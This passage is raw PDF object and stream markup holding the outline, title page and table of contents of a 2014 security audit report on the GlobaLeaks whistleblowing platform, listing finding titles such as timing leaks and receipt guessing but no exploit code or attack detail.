User Input Written to Logs) >> endobj % 'Outline.66.10': class OutlineEntryObject 305 0 obj << /Dest [ 216 0 R /XYZ 62.69291 765.0236 0 ] /Next 306 0 R /Parent 294 0 R /Prev 304 0 R /Title (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel Attacks) >> endobj % 'Outline.66.11': class OutlineEntryObject 306 0 obj << /Dest [ 220 0 R /XYZ 62.69291 765.0236 0 ] /Next 307 0 R /Parent 294 0 R /Prev 305 0 R /Title (Issue J.1: Timing Leak of File Download Token) >> endobj % 'Outline.66.12': class OutlineEntryObject 307 0 obj << /Dest [ 224 0 R /XYZ 62.69291 765.0236 0 ] /Next 308 0 R /Parent 294 0 R /Prev 306 0 R /Title (Issue J.2: Timing Leak of Collection Download Token) >> endobj % 'Outline.66.13': class OutlineEntryObject 308 0 obj << /Dest [ 227 0 R /XYZ 62.69291 765.0236 0 ] /Next 309 0 R /Parent 294 0 R /Prev 307 0 R /Title (Issue J.3: Timing Leak of XSRF Token) >> endobj % 'Outline.66.14': class OutlineEntryObject 309 0 obj << /Dest [ 229 0 R /XYZ 62.69291 765.0236 0 ] /Next 310 0 R /Parent 294 0 R /Prev 308 0 R /Title (Issue J.4: Timing Leak of Session ID) >> endobj % 'Outline.66.15': class OutlineEntryObject 310 0 obj << /Dest [ 234 0 R /XYZ 62.69291 765.0236 0 ] /Next 311 0 R /Parent 294 0 R /Prev 309 0 R /Title (Issue J.5: Timing Leak of Usernames) >> endobj % 'Outline.66.16': class OutlineEntryObject 311 0 obj << /Dest [ 238 0 R /XYZ 62.69291 765.0236 0 ] /Next 312 0 R /Parent 294 0 R /Prev 310 0 R /Title (Issue J.6: Timing Leak of Receipt Hashes) >> endobj % 'Outline.66.17': class OutlineEntryObject 312 0 obj << /Dest [ 239 0 R /XYZ 62.69291 765.0236 0 ] /Parent 294 0 R /Prev 311 0 R /Title (Issue K: Secrets Generated with Non-CSPRNG) >> endobj % 'Outline.65.1': class OutlineEntryObject 313 0 obj << /Count 3 /Dest [ 245 0 R /XYZ 62.69291 765.0236 0 ] /First 314 0 R /Last 315 0 R /Parent 293 0 R /Prev 294 0 R /Title (Design and Implementation Analysis) >> endobj % 'Outline.67.0': class OutlineEntryObject 314 0 obj << /Dest [ 245 0 R /XYZ 
62.69291 693.0236 0 ] /Next 315 0 R /Parent 313 0 R /Title (Commendations) >> endobj % 'Outline.67.1': class OutlineEntryObject 315 0 obj << /Count 1 /Dest [ 245 0 R /XYZ 62.69291 462.0236 0 ] /First 316 0 R /Last 316 0 R /Parent 313 0 R /Prev 314 0 R /Title (Recommendations) >> endobj % 'Outline.68.0': class OutlineEntryObject 316 0 obj << /Dest [ 245 0 R /XYZ 62.69291 363.0236 0 ] /Parent 315 0 R /Title (Coding Practices) >> endobj % 'Outline.4': class OutlineEntryObject 317 0 obj << /Count 4 /Dest [ 253 0 R /XYZ 62.69291 765.0236 0 ] /First 318 0 R /Last 321 0 R /Next 322 0 R /Parent 281 0 R /Prev 293 0 R /Title (Future Work) >> endobj % 'Outline.69.0': class OutlineEntryObject 318 0 obj << /Dest [ 253 0 R /XYZ 62.69291 732.0236 0 ] /Next 319 0 R /Parent 317 0 R /Title (Online Guessing Attacks) >> endobj % 'Outline.69.1': class OutlineEntryObject 319 0 obj << /Dest [ 253 0 R /XYZ 62.69291 648.0236 0 ] /Next 320 0 R /Parent 317 0 R /Prev 318 0 R /Title (Side-Channel Attacks) >> endobj % 'Outline.69.2': class OutlineEntryObject 320 0 obj << /Dest [ 253 0 R /XYZ 62.69291 564.0236 0 ] /Next 321 0 R /Parent 317 0 R /Prev 319 0 R /Title (Eliminating Threads) >> endobj % 'Outline.69.3': class OutlineEntryObject 321 0 obj << /Dest [ 253 0 R /XYZ 62.69291 492.0236 0 ] /Parent 317 0 R /Prev 320 0 R /Title (Open Questions & Concerns) >> endobj % 'Outline.5': class OutlineEntryObject 322 0 obj << /Count 15 /Dest [ 260 0 R /XYZ 62.69291 765.0236 0 ] /First 323 0 R /Last 337 0 R /Next 338 0 R /Parent 281 0 R /Prev 317 0 R /Title (Appendix A. 
Work Log) >> endobj % 'Outline.70.0': class OutlineEntryObject 323 0 obj << /Dest [ 260 0 R /XYZ 62.69291 732.0236 0 ] /Next 324 0 R /Parent 322 0 R /Title (Prior to This Audit) >> endobj % 'Outline.70.1': class OutlineEntryObject 324 0 obj << /Dest [ 260 0 R /XYZ 62.69291 660.0236 0 ] /Next 325 0 R /Parent 322 0 R /Prev 323 0 R /Title (2014-01-28 to 2014-02-03) >> endobj % 'Outline.70.2': class OutlineEntryObject 325 0 obj << /Dest [ 260 0 R /XYZ 62.69291 522.0236 0 ] /Next 326 0 R /Parent 322 0 R /Prev 324 0 R /Title (2014-02-04) >> endobj % 'Outline.70.3': class OutlineEntryObject 326 0 obj << /Dest [ 260 0 R /XYZ 62.69291 360.0236 0 ] /Next 327 0 R /Parent 322 0 R /Prev 325 0 R /Title (2014-02-05) >> endobj % 'Outline.70.4': class OutlineEntryObject 327 0 obj << /Dest [ 261 0 R /XYZ 62.69291 299.5441 0 ] /Next 328 0 R /Parent 322 0 R /Prev 326 0 R /Title (2014-02-06) >> endobj % 'Outline.70.5': class OutlineEntryObject 328 0 obj << /Dest [ 265 0 R /XYZ 62.69291 453.0236 0 ] /Next 329 0 R /Parent 322 0 R /Prev 327 0 R /Title (2014-02-07) >> endobj % 'Outline.70.6': class OutlineEntryObject 329 0 obj << /Dest [ 265 0 R /XYZ 62.69291 399.0236 0 ] /Next 330 0 R /Parent 322 0 R /Prev 328 0 R /Title (2014-02-10) >> endobj % 'Outline.70.7': class OutlineEntryObject 330 0 obj << /Dest [ 265 0 R /XYZ 62.69291 243.0236 0 ] /Next 331 0 R /Parent 322 0 R /Prev 329 0 R /Title (2014-02-11) >> endobj % 'Outline.70.8': class OutlineEntryObject 331 0 obj << /Dest [ 265 0 R /XYZ 62.69291 189.0236 0 ] /Next 332 0 R /Parent 322 0 R /Prev 330 0 R /Title (2014-02-12) >> endobj % 'Outline.70.9': class OutlineEntryObject 332 0 obj << /Dest [ 265 0 R /XYZ 62.69291 159.0236 0 ] /Next 333 0 R /Parent 322 0 R /Prev 331 0 R /Title (2014-02-13) >> endobj % 'Outline.70.10': class OutlineEntryObject 333 0 obj << /Dest [ 267 0 R /XYZ 62.69291 591.8236 0 ] /Next 334 0 R /Parent 322 0 R /Prev 332 0 R /Title (2014-02-14) >> endobj % 'Outline.70.11': class OutlineEntryObject 334 0 obj << /Dest [ 
267 0 R /XYZ 62.69291 537.8236 0 ] /Next 335 0 R /Parent 322 0 R /Prev 333 0 R /Title (2014-02-17) >> endobj % 'Outline.70.12': class OutlineEntryObject 335 0 obj << /Dest [ 267 0 R /XYZ 62.69291 507.8236 0 ] /Next 336 0 R /Parent 322 0 R /Prev 334 0 R /Title (2014-02-18) >> endobj % 'Outline.70.13': class OutlineEntryObject 336 0 obj << /Dest [ 267 0 R /XYZ 62.69291 453.8236 0 ] /Next 337 0 R /Parent 322 0 R /Prev 335 0 R /Title (2014-02-19) >> endobj % 'Outline.70.14': class OutlineEntryObject 337 0 obj << /Dest [ 267 0 R /XYZ 62.69291 399.8236 0 ] /Parent 322 0 R /Prev 336 0 R /Title (2014-02-20) >> endobj % 'Outline.6': class OutlineEntryObject 338 0 obj << /Dest [ 269 0 R /XYZ 62.69291 765.0236 0 ] /Next 339 0 R /Parent 281 0 R /Prev 322 0 R /Title (Appendix B. Brainstorming Notes) >> endobj % 'Outline.7': class OutlineEntryObject 339 0 obj << /Dest [ 275 0 R /XYZ 62.69291 765.0236 0 ] /Next 340 0 R /Parent 281 0 R /Prev 338 0 R /Title (Appendix C. Script for Issue E) >> endobj % 'Outline.8': class OutlineEntryObject 340 0 obj << /Dest [ 276 0 R /XYZ 62.69291 765.0236 0 ] /Next 341 0 R /Parent 281 0 R /Prev 339 0 R /Title (Appendix D. Side-Channel Attack Proof of Concept) >> endobj % 'Outline.9': class OutlineEntryObject 341 0 obj << /Dest [ 278 0 R /XYZ 62.69291 765.0236 0 ] /Parent 281 0 R /Prev 340 0 R /Title (Appendix E. 
Computing Multiple Target Guessing Success Probabilities) >> endobj % 'R342': class PDFPages 342 0 obj % page tree << /Count 49 /Kids [ 68 0 R 133 0 R 137 0 R 141 0 R 142 0 R 148 0 R 149 0 R 150 0 R 153 0 R 155 0 R 158 0 R 168 0 R 170 0 R 173 0 R 176 0 R 181 0 R 188 0 R 193 0 R 195 0 R 199 0 R 200 0 R 206 0 R 209 0 R 211 0 R 216 0 R 220 0 R 224 0 R 227 0 R 229 0 R 234 0 R 238 0 R 239 0 R 241 0 R 245 0 R 246 0 R 253 0 R 254 0 R 259 0 R 260 0 R 261 0 R 265 0 R 267 0 R 269 0 R 271 0 R 273 0 R 275 0 R 276 0 R 277 0 R 278 0 R ] /Type /Pages >> endobj % 'R343': class PDFStream 343 0 obj % page stream << /Length 9879 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 741.0236 cm q 0 0 0 rg BT 1 0 0 1 0 4 Tm /F2 20 Tf 24 TL 48.24488 0 Td (Report of Security Audit of GlobaLeaks) Tj T* -48.24488 0 Td ET Q Q q 1 0 0 1 62.69291 725.0236 cm Q q 1 0 0 1 62.69291 725.0236 cm Q q 1 0 0 1 62.69291 641.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 69 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 69 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Principal Investigators:) Tj T* ET Q Q q 1 0 0 1 23 63 cm Q q 1 0 0 1 23 63 cm Q q 1 0 0 1 23 51 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Nathan Wilcox <) Tj 0 0 .501961 rg (nathan@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 45 cm Q q 1 0 0 1 23 33 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Zooko Wilcox-O'Hearn <) Tj 0 0 .501961 rg (zooko@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 27 cm Q q 1 0 0 1 23 15 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 
10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Taylor Hornby <) Tj 0 0 .501961 rg (taylor@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 9 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Darius Bacon <) Tj 0 0 .501961 rg (darius@LeastAuthority.com) Tj 0 0 0 rg (>) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 641.0236 cm Q q 1 0 0 1 62.69291 608.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Contents) Tj T* ET Q Q q 1 0 0 1 62.69291 86.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 0 501 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Overview) Tj T* ET Q Q q 1 0 0 1 397.8898 501 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 483 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Report Revision) Tj T* ET Q Q q 1 0 0 1 397.8898 483 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 465 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Audit Scope) Tj T* ET Q Q q 1 0 0 1 397.8898 465 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 447 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Methodology and Disclosure) Tj T* ET Q Q q 1 0 0 1 397.8898 447 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (3) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 429 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Process) Tj T* ET Q Q q 1 0 0 1 397.8898 429 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (4) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 411 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg 
(Issue Investigation and Remediation) Tj T* ET Q Q q 1 0 0 1 397.8898 411 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (4) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 393 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Coverage) Tj T* ET Q Q q 1 0 0 1 397.8898 393 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 375 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Target Code) Tj T* ET Q Q q 1 0 0 1 397.8898 375 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 357 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Revision) Tj T* ET Q Q q 1 0 0 1 397.8898 357 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 339 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Dependencies) Tj T* ET Q Q q 1 0 0 1 397.8898 339 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 321 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Target Configuration) Tj T* ET Q Q q 1 0 0 1 397.8898 321 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (6) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 303 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Findings) Tj T* ET Q Q q 1 0 0 1 397.8898 303 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 66.44 0 Td (8) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 285 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Vulnerabilities) Tj T* ET Q Q q 1 0 0 1 397.8898 285 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (8) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 267 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue Format) Tj T* ET Q Q q 1 0 0 1 397.8898 267 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td 
(8) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 249 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue A. Plaintext is Written to Disk Before Encryption) Tj T* ET Q Q q 1 0 0 1 397.8898 249 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 66.44 0 Td (9) Tj T* -66.44 0 Td ET Q Q q 1 0 0 1 0 231 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue B. SHA256 of Plaintext File is Saved when Encryption is Enabled) Tj T* ET Q Q q 1 0 0 1 397.8898 231 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (11) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 213 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue C. Receipts are Vulnerable to Guessing) Tj T* ET Q Q q 1 0 0 1 397.8898 213 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (13) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 195 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue D. A Receiver Can Suppress File Encryption With No Warning to Others) Tj T* ET Q Q q 1 0 0 1 397.8898 195 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (15) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 177 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue E. Parallel Requests Bypass Exponentially Increasing Login Delay) Tj T* ET Q Q q 1 0 0 1 397.8898 177 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (16) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 159 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue F. Tip Files Can Be Downloaded Without Authenticating) Tj T* ET Q Q q 1 0 0 1 397.8898 159 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (17) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 141 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue G. 
Unescaped Characters Put Into ) Tj /F3 10 Tf 0 0 0 rg (Content-Disposition ) Tj /F1 10 Tf 0 0 .501961 rg (Header) Tj T* ET Q Q q 1 0 0 1 397.8898 141 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (19) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 111 cm q BT 1 0 0 1 40 14 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue H. Plaintext File Kept on Server when Whistleblower Does Not Finish) Tj T* (Submitting Tip) Tj T* ET Q Q q 1 0 0 1 397.8898 123 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (21) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 93 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue I. User Input Written to Logs) Tj T* ET Q Q q 1 0 0 1 397.8898 93 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (23) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 75 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel Attacks) Tj T* ET Q Q q 1 0 0 1 397.8898 75 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (25) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 57 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.1: Timing Leak of File Download Token) Tj T* ET Q Q q 1 0 0 1 397.8898 57 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (26) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 39 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.2: Timing Leak of Collection Download Token) Tj T* ET Q Q q 1 0 0 1 397.8898 39 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (27) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 21 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.3: Timing Leak of XSRF Token) Tj T* ET Q Q q 1 0 0 1 397.8898 21 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (28) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 3 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.4: Timing 
Leak of Session ID) Tj T* ET Q Q q 1 0 0 1 397.8898 3 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (29) Tj T* -60.88 0 Td ET Q Q q Q Q endstream endobj % 'R344': class PDFStream 344 0 obj % page stream << /Length 8286 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 189.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 0 561 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.5: Timing Leak of Usernames) Tj T* ET Q Q q 1 0 0 1 397.8898 561 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (30) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 543 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue J.6: Timing Leak of Receipt Hashes) Tj T* ET Q Q q 1 0 0 1 397.8898 543 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (31) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 525 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Issue K: Secrets Generated with Non-CSPRNG) Tj T* ET Q Q q 1 0 0 1 397.8898 525 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (32) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 507 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Design and Implementation Analysis) Tj T* ET Q Q q 1 0 0 1 397.8898 507 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (34) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 489 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Commendations) Tj T* ET Q Q q 1 0 0 1 397.8898 489 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (34) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 471 cm q BT 1 0 0 1 40 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Recommendations) Tj T* ET Q Q q 1 0 0 1 397.8898 471 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (34) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 453 cm q BT 1 0 0 1 60 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Coding Practices) Tj T* ET Q Q q 1 0 0 1 397.8898 453 cm q 0 0 
.501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (34) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 435 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Future Work) Tj T* ET Q Q q 1 0 0 1 397.8898 435 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (36) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 417 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Online Guessing Attacks) Tj T* ET Q Q q 1 0 0 1 397.8898 417 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (36) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 399 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Side-Channel Attacks) Tj T* ET Q Q q 1 0 0 1 397.8898 399 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (36) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 381 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Eliminating Threads) Tj T* ET Q Q q 1 0 0 1 397.8898 381 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (36) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 363 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Open Questions & Concerns) Tj T* ET Q Q q 1 0 0 1 397.8898 363 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (36) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 345 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 .501961 rg (Appendix A. 
Work Log) Tj T* ET Q Q q 1 0 0 1 397.8898 345 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL 60.88 0 Td (39) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 327 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (Prior to This Audit) Tj T* ET Q Q q 1 0 0 1 397.8898 327 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (39) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 309 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-01-28 to 2014-02-03) Tj T* ET Q Q q 1 0 0 1 397.8898 309 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (39) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 291 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-04) Tj T* ET Q Q q 1 0 0 1 397.8898 291 cm q 0 0 .501961 rg 0 0 .501961 RG BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 60.88 0 Td (39) Tj T* -60.88 0 Td ET Q Q q 1 0 0 1 0 273 cm q BT 1 0 0 1 20 2 Tm 12 TL /F1 10 Tf 0 0 .501961 rg (2014-02-05) 